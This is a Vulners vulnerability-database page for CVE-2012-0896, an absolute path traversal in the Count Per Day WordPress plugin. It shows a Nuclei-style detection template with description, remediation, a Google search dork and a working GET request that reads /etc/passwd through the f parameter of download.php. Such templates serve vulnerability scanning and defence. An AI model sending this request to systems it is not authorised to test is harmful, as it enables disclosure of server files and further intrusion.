Vulners
Lucene search
Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2012-0896 | 12 Jan 201200:00 | – | circl |
 | CVE-2012-0896 | 20 Jan 201217:00 | – | cve |
 | CVE-2012-0896 | 20 Jan 201217:00 | – | cvelist |
 | EUVD-2012-0919 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-0896 | 20 Jan 201217:55 | – | nvd |
 | WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 202000:00 | – | openvas |
 | Path traversal | 20 Jan 201217:55 | – | prion |
 | Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access | 1 Aug 201400:00 | – | wpvulndb |
id: CVE-2012-0896
info:
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author: daffainfo
severity: medium
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
remediation: |
Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/108631/
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
- http://wordpress.org/extend/plugins/count-per-day/changelog/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2012-0896
cwe-id: CWE-22
epss-score: 0.00827
epss-percentile: 0.74931
cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: count_per_day_project
product: count_per_day
google-query: inurl:"/wp-content/plugins/count-per-day"
tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402203d0fc303ede7460b33941e9c992b6d57dde7fccc00cfa99a8e391837067b92250220341be7895c9c909d6783c6295f52afa2bf2707047a4ae1f3dbe2fe21826221cc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 25
EPSS0.00827